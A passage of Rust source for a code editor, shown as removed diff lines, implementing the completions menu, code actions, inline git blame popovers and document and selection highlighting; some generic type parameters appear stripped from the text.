editor.refresh_document_highlights(cx); - })?; - } - Ok(()) - })) - } - - pub fn show_word_completions( - &mut self, - _: &ShowWordCompletions, - window: &mut Window, - cx: &mut Context, - ) { - self.open_completions_menu(true, None, window, cx); - } - - pub fn show_completions( - &mut self, - options: &ShowCompletions, - window: &mut Window, - cx: &mut Context, - ) { - self.open_completions_menu(false, options.trigger.as_deref(), window, cx); - } - - fn open_completions_menu( - &mut self, - ignore_completion_provider: bool, - trigger: Option<&str>, - window: &mut Window, - cx: &mut Context, - ) { - if self.pending_rename.is_some() { - return; - } - if !self.snippet_stack.is_empty() && self.context_menu.borrow().as_ref().is_some() { - return; - } - - let position = self.selections.newest_anchor().head(); - if position.diff_base_anchor.is_some() { - return; - } - let (buffer, buffer_position) = - if let Some(output) = self.buffer.read(cx).text_anchor_for_position(position, cx) { - output - } else { - return; - }; - let buffer_snapshot = buffer.read(cx).snapshot(); - let show_completion_documentation = buffer_snapshot - .settings_at(buffer_position, cx) - .show_completion_documentation; - - let query = Self::completion_query(&self.buffer.read(cx).read(cx), position); - - let trigger_kind = match trigger { - Some(trigger) if buffer.read(cx).completion_triggers().contains(trigger) => { - CompletionTriggerKind::TRIGGER_CHARACTER - } - _ => CompletionTriggerKind::INVOKED, - }; - let completion_context = CompletionContext { - trigger_character: trigger.and_then(|trigger| { - if trigger_kind == CompletionTriggerKind::TRIGGER_CHARACTER { - Some(String::from(trigger)) - } else { - None - } - }), - trigger_kind, - }; - - let (old_range, word_kind) = buffer_snapshot.surrounding_word(buffer_position); - let (old_range, word_to_exclude) = if word_kind == Some(CharKind::Word) { - let word_to_exclude = buffer_snapshot - .text_for_range(old_range.clone()) - .collect::(); - ( - buffer_snapshot.anchor_before(old_range.start) - ..buffer_snapshot.anchor_after(old_range.end), - Some(word_to_exclude), - ) - } else { - (buffer_position..buffer_position, None) - }; - - let completion_settings = language_settings( - buffer_snapshot - .language_at(buffer_position) - .map(|language| language.name()), - buffer_snapshot.file(), - cx, - ) - .completions; - - // The document can be large, so stay in reasonable bounds when searching for words, - // otherwise completion pop-up might be slow to appear. - const WORD_LOOKUP_ROWS: u32 = 5_000; - let buffer_row = text::ToPoint::to_point(&buffer_position, &buffer_snapshot).row; - let min_word_search = buffer_snapshot.clip_point( - Point::new(buffer_row.saturating_sub(WORD_LOOKUP_ROWS), 0), - Bias::Left, - ); - let max_word_search = buffer_snapshot.clip_point( - Point::new(buffer_row + WORD_LOOKUP_ROWS, 0).min(buffer_snapshot.max_point()), - Bias::Right, - ); - let word_search_range = buffer_snapshot.point_to_offset(min_word_search) - ..buffer_snapshot.point_to_offset(max_word_search); - - let provider = self - .completion_provider - .as_ref() - .filter(|_| !ignore_completion_provider); - let skip_digits = query - .as_ref() - .map_or(true, |query| !query.chars().any(|c| c.is_digit(10))); - - let (mut words, provided_completions) = match provider { - Some(provider) => { - let completions = provider.completions( - position.excerpt_id, - &buffer, - buffer_position, - completion_context, - window, - cx, - ); - - let words = match completion_settings.words { - WordsCompletionMode::Disabled => Task::ready(BTreeMap::default()), - WordsCompletionMode::Enabled | WordsCompletionMode::Fallback => cx - .background_spawn(async move { - buffer_snapshot.words_in_range(WordsQuery { - fuzzy_contents: None, - range: word_search_range, - skip_digits, - }) - }), - }; - - (words, completions) - } - None => ( - cx.background_spawn(async move { - buffer_snapshot.words_in_range(WordsQuery { - fuzzy_contents: None, - range: word_search_range, - skip_digits, - }) - }), - Task::ready(Ok(None)), - ), - }; - - let sort_completions = provider - .as_ref() - .map_or(false, |provider| provider.sort_completions()); - - let filter_completions = provider - .as_ref() - .map_or(true, |provider| provider.filter_completions()); - - let snippet_sort_order = EditorSettings::get_global(cx).snippet_sort_order; - - let id = post_inc(&mut self.next_completion_id); - let task = cx.spawn_in(window, async move |editor, cx| { - async move { - editor.update(cx, |this, _| { - this.completion_tasks.retain(|(task_id, _)| *task_id >= id); - })?; - - let mut completions = Vec::new(); - if let Some(provided_completions) = provided_completions.await.log_err().flatten() { - completions.extend(provided_completions); - if completion_settings.words == WordsCompletionMode::Fallback { - words = Task::ready(BTreeMap::default()); - } - } - - let mut words = words.await; - if let Some(word_to_exclude) = &word_to_exclude { - words.remove(word_to_exclude); - } - for lsp_completion in &completions { - words.remove(&lsp_completion.new_text); - } - completions.extend(words.into_iter().map(|(word, word_range)| Completion { - replace_range: old_range.clone(), - new_text: word.clone(), - label: CodeLabel::plain(word, None), - icon_path: None, - documentation: None, - source: CompletionSource::BufferWord { - word_range, - resolved: false, - }, - insert_text_mode: Some(InsertTextMode::AS_IS), - confirm: None, - })); - - let menu = if completions.is_empty() { - None - } else { - let mut menu = CompletionsMenu::new( - id, - sort_completions, - show_completion_documentation, - ignore_completion_provider, - position, - buffer.clone(), - completions.into(), - snippet_sort_order, - ); - - menu.filter( - if filter_completions { - query.as_deref() - } else { - None - }, - cx.background_executor().clone(), - ) - .await; - - menu.visible().then_some(menu) - }; - - editor.update_in(cx, |editor, window, cx| { - match editor.context_menu.borrow().as_ref() { - None => {} - Some(CodeContextMenu::Completions(prev_menu)) => { - if prev_menu.id > id { - return; - } - } - _ => return, - } - - if editor.focus_handle.is_focused(window) && menu.is_some() { - let mut menu = menu.unwrap(); - menu.resolve_visible_completions(editor.completion_provider.as_deref(), cx); - - *editor.context_menu.borrow_mut() = - Some(CodeContextMenu::Completions(menu)); - - if editor.show_edit_predictions_in_menu() { - editor.update_visible_inline_completion(window, cx); - } else { - editor.discard_inline_completion(false, cx); - } - - cx.notify(); - } else if editor.completion_tasks.len() <= 1 { - // If there are no more completion tasks and the last menu was - // empty, we should hide it. - let was_hidden = editor.hide_context_menu(window, cx).is_none(); - // If it was already hidden and we don't show inline - // completions in the menu, we should also show the - // inline-completion when available. - if was_hidden && editor.show_edit_predictions_in_menu() { - editor.update_visible_inline_completion(window, cx); - } - } - })?; - - anyhow::Ok(()) - } - .log_err() - .await - }); - - self.completion_tasks.push((id, task)); - } - - #[cfg(feature = "test-support")] - pub fn current_completions(&self) -> Option> { - let menu = self.context_menu.borrow(); - if let CodeContextMenu::Completions(menu) = menu.as_ref()? { - let completions = menu.completions.borrow(); - Some(completions.to_vec()) - } else { - None - } - } - - pub fn confirm_completion( - &mut self, - action: &ConfirmCompletion, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.do_completion(action.item_ix, CompletionIntent::Complete, window, cx) - } - - pub fn confirm_completion_insert( - &mut self, - _: &ConfirmCompletionInsert, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.do_completion(None, CompletionIntent::CompleteWithInsert, window, cx) - } - - pub fn confirm_completion_replace( - &mut self, - _: &ConfirmCompletionReplace, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.do_completion(None, CompletionIntent::CompleteWithReplace, window, cx) - } - - pub fn compose_completion( - &mut self, - action: &ComposeCompletion, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.do_completion(action.item_ix, CompletionIntent::Compose, window, cx) - } - - fn do_completion( - &mut self, - item_ix: Option, - intent: CompletionIntent, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - use language::ToOffset as _; - - let CodeContextMenu::Completions(completions_menu) = self.hide_context_menu(window, cx)? - else { - return None; - }; - - let candidate_id = { - let entries = completions_menu.entries.borrow(); - let mat = entries.get(item_ix.unwrap_or(completions_menu.selected_item))?; - if self.show_edit_predictions_in_menu() { - self.discard_inline_completion(true, cx); - } - mat.candidate_id - }; - - let buffer_handle = completions_menu.buffer; - let completion = completions_menu - .completions - .borrow() - .get(candidate_id)? - .clone(); - cx.stop_propagation(); - - let snippet; - let new_text; - if completion.is_snippet() { - snippet = Some(Snippet::parse(&completion.new_text).log_err()?); - new_text = snippet.as_ref().unwrap().text.clone(); - } else { - snippet = None; - new_text = completion.new_text.clone(); - }; - - let replace_range = choose_completion_range(&completion, intent, &buffer_handle, cx); - let buffer = buffer_handle.read(cx); - let snapshot = self.buffer.read(cx).snapshot(cx); - let replace_range_multibuffer = { - let excerpt = snapshot - .excerpt_containing(self.selections.newest_anchor().range()) - .unwrap(); - let multibuffer_anchor = snapshot - .anchor_in_excerpt(excerpt.id(), buffer.anchor_before(replace_range.start)) - .unwrap() - ..snapshot - .anchor_in_excerpt(excerpt.id(), buffer.anchor_before(replace_range.end)) - .unwrap(); - multibuffer_anchor.start.to_offset(&snapshot) - ..multibuffer_anchor.end.to_offset(&snapshot) - }; - let newest_anchor = self.selections.newest_anchor(); - if newest_anchor.head().buffer_id != Some(buffer.remote_id()) { - return None; - } - - let old_text = buffer - .text_for_range(replace_range.clone()) - .collect::(); - let lookbehind = newest_anchor - .start - .text_anchor - .to_offset(buffer) - .saturating_sub(replace_range.start); - let lookahead = replace_range - .end - .saturating_sub(newest_anchor.end.text_anchor.to_offset(buffer)); - let prefix = &old_text[..old_text.len().saturating_sub(lookahead)]; - let suffix = &old_text[lookbehind.min(old_text.len())..]; - - let selections = self.selections.all::(cx); - let mut ranges = Vec::new(); - let mut linked_edits = HashMap::<_, Vec<_>>::default(); - - for selection in &selections { - let range = if selection.id == newest_anchor.id { - replace_range_multibuffer.clone() - } else { - let mut range = selection.range(); - - // if prefix is present, don't duplicate it - if snapshot.contains_str_at(range.start.saturating_sub(lookbehind), prefix) { - range.start = range.start.saturating_sub(lookbehind); - - // if suffix is also present, mimic the newest cursor and replace it - if selection.id != newest_anchor.id - && snapshot.contains_str_at(range.end, suffix) - { - range.end += lookahead; - } - } - range - }; - - ranges.push(range); - - if !self.linked_edit_ranges.is_empty() { - let start_anchor = snapshot.anchor_before(selection.head()); - let end_anchor = snapshot.anchor_after(selection.tail()); - if let Some(ranges) = self - .linked_editing_ranges_for(start_anchor.text_anchor..end_anchor.text_anchor, cx) - { - for (buffer, edits) in ranges { - linked_edits - .entry(buffer.clone()) - .or_default() - .extend(edits.into_iter().map(|range| (range, new_text.to_owned()))); - } - } - } - } - - cx.emit(EditorEvent::InputHandled { - utf16_range_to_replace: None, - text: new_text.clone().into(), - }); - - self.transact(window, cx, |this, window, cx| { - if let Some(mut snippet) = snippet { - snippet.text = new_text.to_string(); - this.insert_snippet(&ranges, snippet, window, cx).log_err(); - } else { - this.buffer.update(cx, |buffer, cx| { - let auto_indent = match completion.insert_text_mode { - Some(InsertTextMode::AS_IS) => None, - _ => this.autoindent_mode.clone(), - }; - let edits = ranges.into_iter().map(|range| (range, new_text.as_str())); - buffer.edit(edits, auto_indent, cx); - }); - } - for (buffer, edits) in linked_edits { - buffer.update(cx, |buffer, cx| { - let snapshot = buffer.snapshot(); - let edits = edits - .into_iter() - .map(|(range, text)| { - use text::ToPoint as TP; - let end_point = TP::to_point(&range.end, &snapshot); - let start_point = TP::to_point(&range.start, &snapshot); - (start_point..end_point, text) - }) - .sorted_by_key(|(range, _)| range.start); - buffer.edit(edits, None, cx); - }) - } - - this.refresh_inline_completion(true, false, window, cx); - }); - - let show_new_completions_on_confirm = completion - .confirm - .as_ref() - .map_or(false, |confirm| confirm(intent, window, cx)); - if show_new_completions_on_confirm { - self.show_completions(&ShowCompletions { trigger: None }, window, cx); - } - - let provider = self.completion_provider.as_ref()?; - drop(completion); - let apply_edits = provider.apply_additional_edits_for_completion( - buffer_handle, - completions_menu.completions.clone(), - candidate_id, - true, - cx, - ); - - let editor_settings = EditorSettings::get_global(cx); - if editor_settings.show_signature_help_after_edits || editor_settings.auto_signature_help { - // After the code completion is finished, users often want to know what signatures are needed. - // so we should automatically call signature_help - self.show_signature_help(&ShowSignatureHelp, window, cx); - } - - Some(cx.foreground_executor().spawn(async move { - apply_edits.await?; - Ok(()) - })) - } - - pub fn toggle_code_actions( - &mut self, - action: &ToggleCodeActions, - window: &mut Window, - cx: &mut Context, - ) { - let quick_launch = action.quick_launch; - let mut context_menu = self.context_menu.borrow_mut(); - if let Some(CodeContextMenu::CodeActions(code_actions)) = context_menu.as_ref() { - if code_actions.deployed_from_indicator == action.deployed_from_indicator { - // Toggle if we're selecting the same one - *context_menu = None; - cx.notify(); - return; - } else { - // Otherwise, clear it and start a new one - *context_menu = None; - cx.notify(); - } - } - drop(context_menu); - let snapshot = self.snapshot(window, cx); - let deployed_from_indicator = action.deployed_from_indicator; - let mut task = self.code_actions_task.take(); - let action = action.clone(); - cx.spawn_in(window, async move |editor, cx| { - while let Some(prev_task) = task { - prev_task.await.log_err(); - task = editor.update(cx, |this, _| this.code_actions_task.take())?; - } - - let spawned_test_task = editor.update_in(cx, |editor, window, cx| { - if editor.focus_handle.is_focused(window) { - let multibuffer_point = action - .deployed_from_indicator - .map(|row| DisplayPoint::new(row, 0).to_point(&snapshot)) - .unwrap_or_else(|| editor.selections.newest::(cx).head()); - let (buffer, buffer_row) = snapshot - .buffer_snapshot - .buffer_line_for_row(MultiBufferRow(multibuffer_point.row)) - .and_then(|(buffer_snapshot, range)| { - editor - .buffer - .read(cx) - .buffer(buffer_snapshot.remote_id()) - .map(|buffer| (buffer, range.start.row)) - })?; - let (_, code_actions) = editor - .available_code_actions - .clone() - .and_then(|(location, code_actions)| { - let snapshot = location.buffer.read(cx).snapshot(); - let point_range = location.range.to_point(&snapshot); - let point_range = point_range.start.row..=point_range.end.row; - if point_range.contains(&buffer_row) { - Some((location, code_actions)) - } else { - None - } - }) - .unzip(); - let buffer_id = buffer.read(cx).remote_id(); - let tasks = editor - .tasks - .get(&(buffer_id, buffer_row)) - .map(|t| Arc::new(t.to_owned())); - if tasks.is_none() && code_actions.is_none() { - return None; - } - - editor.completion_tasks.clear(); - editor.discard_inline_completion(false, cx); - let task_context = - tasks - .as_ref() - .zip(editor.project.clone()) - .map(|(tasks, project)| { - Self::build_tasks_context(&project, &buffer, buffer_row, tasks, cx) - }); - - Some(cx.spawn_in(window, async move |editor, cx| { - let task_context = match task_context { - Some(task_context) => task_context.await, - None => None, - }; - let resolved_tasks = - tasks - .zip(task_context.clone()) - .map(|(tasks, task_context)| ResolvedTasks { - templates: tasks.resolve(&task_context).collect(), - position: snapshot.buffer_snapshot.anchor_before(Point::new( - multibuffer_point.row, - tasks.column, - )), - }); - let spawn_straight_away = quick_launch - && resolved_tasks - .as_ref() - .map_or(false, |tasks| tasks.templates.len() == 1) - && code_actions - .as_ref() - .map_or(true, |actions| actions.is_empty()); - let debug_scenarios = editor.update(cx, |editor, cx| { - if cx.has_flag::() { - maybe!({ - let project = editor.project.as_ref()?; - let dap_store = project.read(cx).dap_store(); - let mut scenarios = vec![]; - let resolved_tasks = resolved_tasks.as_ref()?; - let debug_adapter: SharedString = buffer - .read(cx) - .language()? - .context_provider()? - .debug_adapter()? - .into(); - dap_store.update(cx, |this, cx| { - for (_, task) in &resolved_tasks.templates { - if let Some(scenario) = this - .debug_scenario_for_build_task( - task.resolved.clone(), - SharedString::from( - task.original_task().label.clone(), - ), - debug_adapter.clone(), - cx, - ) - { - scenarios.push(scenario); - } - } - }); - Some(scenarios) - }) - .unwrap_or_default() - } else { - vec![] - } - })?; - if let Ok(task) = editor.update_in(cx, |editor, window, cx| { - *editor.context_menu.borrow_mut() = - Some(CodeContextMenu::CodeActions(CodeActionsMenu { - buffer, - actions: CodeActionContents::new( - resolved_tasks, - code_actions, - debug_scenarios, - task_context.unwrap_or_default(), - ), - selected_item: Default::default(), - scroll_handle: UniformListScrollHandle::default(), - deployed_from_indicator, - })); - if spawn_straight_away { - if let Some(task) = editor.confirm_code_action( - &ConfirmCodeAction { item_ix: Some(0) }, - window, - cx, - ) { - cx.notify(); - return task; - } - } - cx.notify(); - Task::ready(Ok(())) - }) { - task.await - } else { - Ok(()) - } - })) - } else { - Some(Task::ready(Ok(()))) - } - })?; - if let Some(task) = spawned_test_task { - task.await?; - } - - anyhow::Ok(()) - }) - .detach_and_log_err(cx); - } - - pub fn confirm_code_action( - &mut self, - action: &ConfirmCodeAction, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let actions_menu = - if let CodeContextMenu::CodeActions(menu) = self.hide_context_menu(window, cx)? { - menu - } else { - return None; - }; - - let action_ix = action.item_ix.unwrap_or(actions_menu.selected_item); - let action = actions_menu.actions.get(action_ix)?; - let title = action.label(); - let buffer = actions_menu.buffer; - let workspace = self.workspace()?; - - match action { - CodeActionsItem::Task(task_source_kind, resolved_task) => { - workspace.update(cx, |workspace, cx| { - workspace.schedule_resolved_task( - task_source_kind, - resolved_task, - false, - window, - cx, - ); - - Some(Task::ready(Ok(()))) - }) - } - CodeActionsItem::CodeAction { - excerpt_id, - action, - provider, - } => { - let apply_code_action = - provider.apply_code_action(buffer, action, excerpt_id, true, window, cx); - let workspace = workspace.downgrade(); - Some(cx.spawn_in(window, async move |editor, cx| { - let project_transaction = apply_code_action.await?; - Self::open_project_transaction( - &editor, - workspace, - project_transaction, - title, - cx, - ) - .await - })) - } - CodeActionsItem::DebugScenario(scenario) => { - let context = actions_menu.actions.context.clone(); - - workspace.update(cx, |workspace, cx| { - workspace.start_debug_session(scenario, context, Some(buffer), window, cx); - }); - Some(Task::ready(Ok(()))) - } - } - } - - pub async fn open_project_transaction( - this: &WeakEntity, - workspace: WeakEntity, - transaction: ProjectTransaction, - title: String, - cx: &mut AsyncWindowContext, - ) -> Result<()> { - let mut entries = transaction.0.into_iter().collect::>(); - cx.update(|_, cx| { - entries.sort_unstable_by_key(|(buffer, _)| { - buffer.read(cx).file().map(|f| f.path().clone()) - }); - })?; - - // If the project transaction's edits are all contained within this editor, then - // avoid opening a new editor to display them. - - if let Some((buffer, transaction)) = entries.first() { - if entries.len() == 1 { - let excerpt = this.update(cx, |editor, cx| { - editor - .buffer() - .read(cx) - .excerpt_containing(editor.selections.newest_anchor().head(), cx) - })?; - if let Some((_, excerpted_buffer, excerpt_range)) = excerpt { - if excerpted_buffer == *buffer { - let all_edits_within_excerpt = buffer.read_with(cx, |buffer, _| { - let excerpt_range = excerpt_range.to_offset(buffer); - buffer - .edited_ranges_for_transaction::(transaction) - .all(|range| { - excerpt_range.start <= range.start - && excerpt_range.end >= range.end - }) - })?; - - if all_edits_within_excerpt { - return Ok(()); - } - } - } - } - } else { - return Ok(()); - } - - let mut ranges_to_highlight = Vec::new(); - let excerpt_buffer = cx.new(|cx| { - let mut multibuffer = MultiBuffer::new(Capability::ReadWrite).with_title(title); - for (buffer_handle, transaction) in &entries { - let edited_ranges = buffer_handle - .read(cx) - .edited_ranges_for_transaction::(transaction) - .collect::>(); - let (ranges, _) = multibuffer.set_excerpts_for_path( - PathKey::for_buffer(buffer_handle, cx), - buffer_handle.clone(), - edited_ranges, - DEFAULT_MULTIBUFFER_CONTEXT, - cx, - ); - - ranges_to_highlight.extend(ranges); - } - multibuffer.push_transaction(entries.iter().map(|(b, t)| (b, t)), cx); - multibuffer - })?; - - workspace.update_in(cx, |workspace, window, cx| { - let project = workspace.project().clone(); - let editor = - cx.new(|cx| Editor::for_multibuffer(excerpt_buffer, Some(project), window, cx)); - workspace.add_item_to_active_pane(Box::new(editor.clone()), None, true, window, cx); - editor.update(cx, |editor, cx| { - editor.highlight_background::( - &ranges_to_highlight, - |theme| theme.editor_highlighted_line_background, - cx, - ); - }); - })?; - - Ok(()) - } - - pub fn clear_code_action_providers(&mut self) { - self.code_action_providers.clear(); - self.available_code_actions.take(); - } - - pub fn add_code_action_provider( - &mut self, - provider: Rc, - window: &mut Window, - cx: &mut Context, - ) { - if self - .code_action_providers - .iter() - .any(|existing_provider| existing_provider.id() == provider.id()) - { - return; - } - - self.code_action_providers.push(provider); - self.refresh_code_actions(window, cx); - } - - pub fn remove_code_action_provider( - &mut self, - id: Arc, - window: &mut Window, - cx: &mut Context, - ) { - self.code_action_providers - .retain(|provider| provider.id() != id); - self.refresh_code_actions(window, cx); - } - - fn refresh_code_actions(&mut self, window: &mut Window, cx: &mut Context) -> Option<()> { - let newest_selection = self.selections.newest_anchor().clone(); - let newest_selection_adjusted = self.selections.newest_adjusted(cx).clone(); - let buffer = self.buffer.read(cx); - if newest_selection.head().diff_base_anchor.is_some() { - return None; - } - let (start_buffer, start) = - buffer.text_anchor_for_position(newest_selection_adjusted.start, cx)?; - let (end_buffer, end) = - buffer.text_anchor_for_position(newest_selection_adjusted.end, cx)?; - if start_buffer != end_buffer { - return None; - } - - self.code_actions_task = Some(cx.spawn_in(window, async move |this, cx| { - cx.background_executor() - .timer(CODE_ACTIONS_DEBOUNCE_TIMEOUT) - .await; - - let (providers, tasks) = this.update_in(cx, |this, window, cx| { - let providers = this.code_action_providers.clone(); - let tasks = this - .code_action_providers - .iter() - .map(|provider| provider.code_actions(&start_buffer, start..end, window, cx)) - .collect::>(); - (providers, tasks) - })?; - - let mut actions = Vec::new(); - for (provider, provider_actions) in - providers.into_iter().zip(future::join_all(tasks).await) - { - if let Some(provider_actions) = provider_actions.log_err() { - actions.extend(provider_actions.into_iter().map(|action| { - AvailableCodeAction { - excerpt_id: newest_selection.start.excerpt_id, - action, - provider: provider.clone(), - } - })); - } - } - - this.update(cx, |this, cx| { - this.available_code_actions = if actions.is_empty() { - None - } else { - Some(( - Location { - buffer: start_buffer, - range: start..end, - }, - actions.into(), - )) - }; - cx.notify(); - }) - })); - None - } - - fn start_inline_blame_timer(&mut self, window: &mut Window, cx: &mut Context) { - if let Some(delay) = ProjectSettings::get_global(cx).git.inline_blame_delay() { - self.show_git_blame_inline = false; - - self.show_git_blame_inline_delay_task = - Some(cx.spawn_in(window, async move |this, cx| { - cx.background_executor().timer(delay).await; - - this.update(cx, |this, cx| { - this.show_git_blame_inline = true; - cx.notify(); - }) - .log_err(); - })); - } - } - - fn show_blame_popover( - &mut self, - blame_entry: &BlameEntry, - position: gpui::Point, - cx: &mut Context, - ) { - if let Some(state) = &mut self.inline_blame_popover { - state.hide_task.take(); - cx.notify(); - } else { - let delay = EditorSettings::get_global(cx).hover_popover_delay; - let show_task = cx.spawn(async move |editor, cx| { - cx.background_executor() - .timer(std::time::Duration::from_millis(delay)) - .await; - editor - .update(cx, |editor, cx| { - if let Some(state) = &mut editor.inline_blame_popover { - state.show_task = None; - cx.notify(); - } - }) - .ok(); - }); - let Some(blame) = self.blame.as_ref() else { - return; - }; - let blame = blame.read(cx); - let details = blame.details_for_entry(&blame_entry); - let markdown = cx.new(|cx| { - Markdown::new( - details - .as_ref() - .map(|message| message.message.clone()) - .unwrap_or_default(), - None, - None, - cx, - ) - }); - self.inline_blame_popover = Some(InlineBlamePopover { - position, - show_task: Some(show_task), - hide_task: None, - popover_bounds: None, - popover_state: InlineBlamePopoverState { - scroll_handle: ScrollHandle::new(), - commit_message: details, - markdown, - }, - }); - } - } - - fn hide_blame_popover(&mut self, cx: &mut Context) { - if let Some(state) = &mut self.inline_blame_popover { - if state.show_task.is_some() { - self.inline_blame_popover.take(); - cx.notify(); - } else { - let hide_task = cx.spawn(async move |editor, cx| { - cx.background_executor() - .timer(std::time::Duration::from_millis(100)) - .await; - editor - .update(cx, |editor, cx| { - editor.inline_blame_popover.take(); - cx.notify(); - }) - .ok(); - }); - state.hide_task = Some(hide_task); - } - } - } - - fn refresh_document_highlights(&mut self, cx: &mut Context) -> Option<()> { - if self.pending_rename.is_some() { - return None; - } - - let provider = self.semantics_provider.clone()?; - let buffer = self.buffer.read(cx); - let newest_selection = self.selections.newest_anchor().clone(); - let cursor_position = newest_selection.head(); - let (cursor_buffer, cursor_buffer_position) = - buffer.text_anchor_for_position(cursor_position, cx)?; - let (tail_buffer, _) = buffer.text_anchor_for_position(newest_selection.tail(), cx)?; - if cursor_buffer != tail_buffer { - return None; - } - let debounce = EditorSettings::get_global(cx).lsp_highlight_debounce; - self.document_highlights_task = Some(cx.spawn(async move |this, cx| { - cx.background_executor() - .timer(Duration::from_millis(debounce)) - .await; - - let highlights = if let Some(highlights) = cx - .update(|cx| { - provider.document_highlights(&cursor_buffer, cursor_buffer_position, cx) - }) - .ok() - .flatten() - { - highlights.await.log_err() - } else { - None - }; - - if let Some(highlights) = highlights { - this.update(cx, |this, cx| { - if this.pending_rename.is_some() { - return; - } - - let buffer_id = cursor_position.buffer_id; - let buffer = this.buffer.read(cx); - if !buffer - .text_anchor_for_position(cursor_position, cx) - .map_or(false, |(buffer, _)| buffer == cursor_buffer) - { - return; - } - - let cursor_buffer_snapshot = cursor_buffer.read(cx); - let mut write_ranges = Vec::new(); - let mut read_ranges = Vec::new(); - for highlight in highlights { - for (excerpt_id, excerpt_range) in - buffer.excerpts_for_buffer(cursor_buffer.read(cx).remote_id(), cx) - { - let start = highlight - .range - .start - .max(&excerpt_range.context.start, cursor_buffer_snapshot); - let end = highlight - .range - .end - .min(&excerpt_range.context.end, cursor_buffer_snapshot); - if start.cmp(&end, cursor_buffer_snapshot).is_ge() { - continue; - } - - let range = Anchor { - buffer_id, - excerpt_id, - text_anchor: start, - diff_base_anchor: None, - }..Anchor { - buffer_id, - excerpt_id, - text_anchor: end, - diff_base_anchor: None, - }; - if highlight.kind == lsp::DocumentHighlightKind::WRITE { - write_ranges.push(range); - } else { - read_ranges.push(range); - } - } - } - - this.highlight_background::( - &read_ranges, - |theme| theme.editor_document_highlight_read_background, - cx, - ); - this.highlight_background::( - &write_ranges, - |theme| theme.editor_document_highlight_write_background, - cx, - ); - cx.notify(); - }) - .log_err(); - } - })); - None - } - - fn prepare_highlight_query_from_selection( - &mut self, - cx: &mut Context, - ) -> Option<(String, Range)> { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - return None; - } - if !EditorSettings::get_global(cx).selection_highlight { - return None; - } - if self.selections.count() != 1 || self.selections.line_mode { - return None; - } - let selection = self.selections.newest::(cx); - if selection.is_empty() || selection.start.row != selection.end.row { - return None; - } - let multi_buffer_snapshot = self.buffer().read(cx).snapshot(cx); - let selection_anchor_range = selection.range().to_anchors(&multi_buffer_snapshot); - let query = multi_buffer_snapshot - .text_for_range(selection_anchor_range.clone()) - .collect::(); - if query.trim().is_empty() { - return None; - } - Some((query, selection_anchor_range)) - } - - fn update_selection_occurrence_highlights( - &mut self, - query_text: String, - query_range: Range, - multi_buffer_range_to_query: Range, - use_debounce: bool, - window: &mut Window, - cx: &mut Context, - ) -> Task<()> { - let multi_buffer_snapshot = self.buffer().read(cx).snapshot(cx); - cx.spawn_in(window, async move |editor, cx| { - if use_debounce { - cx.background_executor() - .timer(SELECTION_HIGHLIGHT_DEBOUNCE_TIMEOUT) - .await; - } - let match_task = cx.background_spawn(async move { - let buffer_ranges = multi_buffer_snapshot - .range_to_buffer_ranges(multi_buffer_range_to_query) - .into_iter() - .filter(|(_, excerpt_visible_range, _)| !excerpt_visible_range.is_empty()); - let mut match_ranges = Vec::new(); - for (buffer_snapshot, search_range, excerpt_id) in buffer_ranges { - match_ranges.extend( - project::search::SearchQuery::text( - query_text.clone(), - false, - false, - false, - Default::default(), - Default::default(), - false, - None, - ) - .unwrap() - .search(&buffer_snapshot, Some(search_range.clone())) - .await - .into_iter() - .filter_map(|match_range| { - let match_start = buffer_snapshot - .anchor_after(search_range.start + match_range.start); - let match_end = - buffer_snapshot.anchor_before(search_range.start + match_range.end); - let match_anchor_range = Anchor::range_in_buffer( - excerpt_id, - buffer_snapshot.remote_id(), - match_start..match_end, - ); - (match_anchor_range != query_range).then_some(match_anchor_range) - }), - ); - } - match_ranges - }); - let match_ranges = match_task.await; - editor - .update_in(cx, |editor, _, cx| { - editor.clear_background_highlights::(cx); - if !match_ranges.is_empty() { - editor.highlight_background::( - &match_ranges, - |theme| theme.editor_document_highlight_bracket_background, - cx, - ) - } - }) - .log_err(); - }) - } - - fn refresh_selected_text_highlights( - &mut self, - on_buffer_edit: bool, - window: &mut Window, - cx: &mut Context, - ) { - let Some((query_text, query_range)) = self.prepare_highlight_query_from_selection(cx) - else { - self.clear_background_highlights::(cx); - self.quick_selection_highlight_task.take(); - self.debounced_selection_highlight_task.take(); - return; - }; - let multi_buffer_snapshot = self.buffer().read(cx).snapshot(cx); - if on_buffer_edit - || self - .quick_selection_highlight_task - .as_ref() - .map_or(true, |(prev_anchor_range, _)| { - prev_anchor_range != &query_range - }) - { - let multi_buffer_visible_start = self - .scroll_manager - .anchor() - .anchor - .to_point(&multi_buffer_snapshot); - let multi_buffer_visible_end = multi_buffer_snapshot.clip_point( - multi_buffer_visible_start - + Point::new(self.visible_line_count().unwrap_or(0.).ceil() as u32, 0), - Bias::Left, - ); - let multi_buffer_visible_range = multi_buffer_visible_start..multi_buffer_visible_end; - self.quick_selection_highlight_task = Some(( - query_range.clone(), - self.update_selection_occurrence_highlights( - query_text.clone(), - query_range.clone(), - multi_buffer_visible_range, - false, - window, - cx, - ), - )); - } - if on_buffer_edit - || self - .debounced_selection_highlight_task - .as_ref() - .map_or(true, |(prev_anchor_range, _)| { - prev_anchor_range != &query_range - }) - { - let multi_buffer_start = multi_buffer_snapshot - .anchor_before(0) - .to_point(&multi_buffer_snapshot); - let multi_buffer_end = multi_buffer_snapshot - .anchor_after(multi_buffer_snapshot.len()) - .to_point(&multi_buffer_snapshot); - let multi_buffer_full_range = multi_buffer_start..multi_buffer_end; - self.debounced_selection_highlight_task = Some(( - query_range.clone(), - self.update_selection_occurrence_highlights( - query_text, - query_range, - multi_buffer_full_range, - true, - window, - cx, - ), - )); - } - } - - pub fn refresh_inline_completion( - &mut self, - debounce: bool, - user_requested: bool, - window: &mut Window, - cx: &mut Context, - ) -> Option<()> { - let provider = self.edit_prediction_provider()?; - let cursor = self.selections.newest_anchor().head(); - let (buffer, cursor_buffer_position) = - 